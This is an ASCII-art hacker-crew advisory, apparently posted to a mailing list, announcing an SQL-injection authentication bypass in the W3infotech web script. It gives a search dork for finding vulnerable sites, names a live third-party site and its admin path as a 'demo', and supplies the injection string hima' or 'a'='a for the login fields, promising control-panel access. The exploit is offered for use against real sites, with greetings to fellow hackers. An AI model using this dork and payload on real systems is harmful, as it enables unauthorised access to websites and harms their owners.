another exploit link : http://hell-z0ne.org/w3infotech.txt [*]############################################## [+] |____ViRuS_HiMa@YouR SyS__|__\ # [+] |______________________|___||\*___ # [+] |______________________|___||""|"*\___, # [+] |______________________|___||""|*"|___|| # [+] "([ (@)''(@)""""""(|*(@)(@)********(@)* # [+]====================================================================|| [*] About : W3infotech ( Auth Bypass ) SQL injection Vulnerability || [!] Site : http://www.w3infotech.com || [!] Author : ViRuS_HiMa || [!] Site : wWw.HeLL-z0ne.org || [!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM || [!] Location : Cairo-007 || [!]====================================================================|| [!] [H]eL[L] [Z]on[E] [C]re[W] || [!]====================================================================|| [!] [!] Exploitation : || [!] [!] you can use this dork : "Powered By W3infotech" || [!] [!] Live demo : http://www.estad-aldoha.net || [!] [!] Just add the admin path ,, so it will be : || [!] [!] http://www.estad-aldoha.net/admin || [!] [!] then auth bypass using this password : || [!] [!] hima' or 'a'='a || [!] [!] it mean that you have to type the same code in user and pass || [!] [!] what you got ?? ,, you are in the script control panel now :p || [!] [!]====================================================================|| [!] Greetz : Haxker & explit007 & Kasper-Ksa & All My Friends . || [*]====================================================================|| _________________________________________________________________ Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010